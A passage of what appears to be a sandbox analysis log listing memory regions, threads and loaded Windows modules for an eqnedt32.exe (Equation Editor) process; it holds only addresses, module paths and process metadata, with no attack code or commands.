region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3030 start_va = 0x580000 end_va = 0x596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3031 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3032 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3033 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3034 start_va = 0x5d0000 end_va = 0x60bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 3035 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3036 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3037 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3038 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3039 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3040 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3041 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3042 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3043 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3044 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3045 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3046 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3051 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3052 start_va = 0x580000 end_va = 0x580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3053 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3054 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3055 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3056 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3057 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Region: id = 3058 start_va = 0x580000 end_va = 0x598fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 3059 start_va = 0x580000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3060 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3061 start_va = 0x13f80000 end_va = 0x1437ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000013f80000" filename = "" Thread: id = 1 os_tid = 0x5f8 Thread: id = 2 os_tid = 0x630 Thread: id = 3 os_tid = 0x13fc Thread: id = 4 os_tid = 0x13f8 Thread: id = 5 os_tid = 0x13f4 Thread: id = 6 os_tid = 0x13f0 Thread: id = 7 os_tid = 0x13ec Thread: id = 8 os_tid = 0x13d4 Thread: id = 9 os_tid = 0x13ac Thread: id = 10 os_tid = 0x13a8 Thread: id = 11 os_tid = 0x139c Thread: id = 12 os_tid = 0x1394 Thread: id = 13 os_tid = 0x1390 Thread: id = 14 os_tid = 0x138c Thread: id = 15 os_tid = 0x1388 Thread: id = 16 os_tid = 0x1380 Thread: id = 17 os_tid = 0x1364 Thread: id = 18 os_tid = 0x134c Thread: id = 19 os_tid = 0x1330 Thread: id = 20 os_tid = 0x132c Thread: id = 21 os_tid = 0x1324 Thread: id = 22 os_tid = 0x1318 Thread: id = 23 os_tid = 0x1314 Thread: id = 24 os_tid = 0x1310 Thread: id = 25 os_tid = 0x130c Thread: id = 26 os_tid = 0x1308 Thread: id = 27 os_tid = 0x12fc Thread: id = 28 os_tid = 0x12f8 Thread: id = 29 os_tid = 0x12f4 Thread: id = 30 os_tid = 0x12f0 Thread: id = 31 os_tid = 0x12ec Thread: id = 32 os_tid = 0x1014 Thread: id = 33 os_tid = 0x618 Thread: id = 34 os_tid = 0x3ac Thread: id = 35 os_tid = 0x194 Thread: id = 36 os_tid = 0x524 Thread: id = 37 os_tid = 0xc70 Thread: id = 58 os_tid = 0x1148 Process: id = "2" image_name = "eqnedt32.exe" filename = "c:\\program files (x86)\\common files\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x6e610000" os_pid = "0xc28" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x274" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 752 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 753 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 754 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 755 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 756 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 757 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 758 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 759 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 760 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 761 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 762 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 763 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 764 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 765 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 766 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 767 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 768 start_va = 0x490000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 769 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 770 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 771 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 772 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 773 start_va = 0x5d0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 774 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 775 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 776 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 777 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 778 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 779 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 780 start_va = 0x73e50000 end_va = 0x73ee1fff monitored = 0 entry_point = 0x73e90380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 781 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 782 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 783 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 784 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 785 start_va = 0x550000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 786 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 787 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 788 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 789 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 790 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 791 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 792 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 793 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 794 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 795 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 796 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 797 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 800 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 801 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 802 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 803 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 804 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 805 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 806 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 807 start_va = 0x6b4d0000 end_va = 0x6b561fff monitored = 0 entry_point = 0x6b4ddd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 808 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 809 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 810 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 811 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 812 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 813 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 814 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 815 start_va = 0x1fe0000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 816 start_va = 0x6d0000 end_va = 0x760fff monitored = 0 entry_point = 0x708cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 817 start_va = 0x21a0000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 818 start_va = 0x1fe0000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 819 start_va = 0x2190000 end_va = 0x219ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002190000" filename = "" Region: id = 820 start_va = 0x2370000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 821 start_va = 0x6c5a0000 end_va = 0x6c928fff monitored = 0 entry_point = 0x6c63cc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 822 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 823 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 824 start_va = 0x72d30000 end_va = 0x72f3efff monitored = 0 entry_point = 0x72ddb0a0 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll") Region: id = 825 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 826 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 827 start_va = 0x3de20000 end_va = 0x3de2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 828 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 829 start_va = 0x21a0000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 830 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 831 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 832 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 843 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 844 start_va = 0x1fe0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 845 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 846 start_va = 0x710000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 847 start_va = 0x750000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 848 start_va = 0x21a0000 end_va = 0x229ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 849 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 850 start_va = 0x2770000 end_va = 0x286ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 851 start_va = 0x764e0000 end_va = 0x765fefff monitored = 0 entry_point = 0x76525980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 852 start_va = 0x20e0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 853 start_va = 0x22a0000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 854 start_va = 0x2870000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 855 start_va = 0x5a0000 end_va = 0x5a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 856 start_va = 0x5b0000 end_va = 0x5bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 857 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 858 start_va = 0x2970000 end_va = 0x2a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 859 start_va = 0x790000 end_va = 0x793fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 860 start_va = 0x73db0000 end_va = 0x73dccfff monitored = 0 entry_point = 0x73db3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 861 start_va = 0x2a30000 end_va = 0x2d66fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 862 start_va = 0x7a0000 end_va = 0x7a3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 863 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 864 start_va = 0x2120000 end_va = 0x2120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 865 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 866 start_va = 0x2d70000 end_va = 0x3261fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002d70000" filename = "" Region: id = 867 start_va = 0x3270000 end_va = 0x42affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 868 start_va = 0x2140000 end_va = 0x2144fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 869 start_va = 0x42b0000 end_va = 0xa055fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 872 start_va = 0x71780000 end_va = 0x718fdfff monitored = 0 entry_point = 0x717fc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 873 start_va = 0x73ae0000 end_va = 0x73daafff monitored = 0 entry_point = 0x73d1c4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 874 start_va = 0x2150000 end_va = 0x2156fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 875 start_va = 0x71570000 end_va = 0x7177cfff monitored = 0 entry_point = 0x7165acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 876 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 877 start_va = 0x2160000 end_va = 0x2160fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: 